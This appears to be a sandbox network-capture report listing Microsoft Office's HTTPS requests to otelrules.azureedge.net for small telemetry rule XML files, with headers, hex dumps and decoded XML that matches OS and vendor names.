                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                            x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141733Z-178bfbc474b9xljthC1NYCtw9400000001d000000000n4t5
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            65192.168.2.64977613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                            x-ms-request-id: 792329fd-401e-0035-1f6c-3b82d8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141733Z-178bfbc474bv7whqhC1NYC1fg400000001ng000000007nxr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            66192.168.2.64977713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                            x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141733Z-178bfbc474bscnbchC1NYCe7eg00000001ug000000001k85
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            67192.168.2.64977913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                            x-ms-request-id: c2180679-501e-008f-16bc-3b9054000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141735Z-178bfbc474btvfdfhC1NYCa2en00000001qg000000007vtx
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            68192.168.2.64978013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                            x-ms-request-id: 81adefec-d01e-008e-4aab-3b387a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141735Z-r1d97b99577brct2hC1TEBambg000000041000000000mpwy
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            69192.168.2.64978113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                            x-ms-request-id: 71c2edc3-001e-0082-0fa6-3b5880000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141735Z-r1d97b9957747b9jhC1TEBgyec0000000am0000000009k1c
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:36 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            70192.168.2.64978213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:36 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                            x-ms-request-id: 5b8d3f05-a01e-006f-2465-3b13cd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141736Z-178bfbc474btrnf9hC1NYCb80g00000001s000000000bscs
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:36 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            71192.168.2.64978313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:35 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:36 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                            x-ms-request-id: 5ac7c1c0-801e-0083-5da5-3bf0ae000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141736Z-r1d97b99577gg97qhC1TEBcrf40000000ad0000000000qsh
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:36 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            72192.168.2.64978413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:37 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                            x-ms-request-id: c747a0f9-901e-005b-69ac-3b2005000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141737Z-r1d97b995774zjnrhC1TEBv1ww0000000agg0000000023mc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            73192.168.2.64978513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:37 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                            x-ms-request-id: 5848700c-201e-0033-129b-3bb167000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141737Z-r1d97b99577dd2gchC1TEBz5ys0000000a8g00000000ctkq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
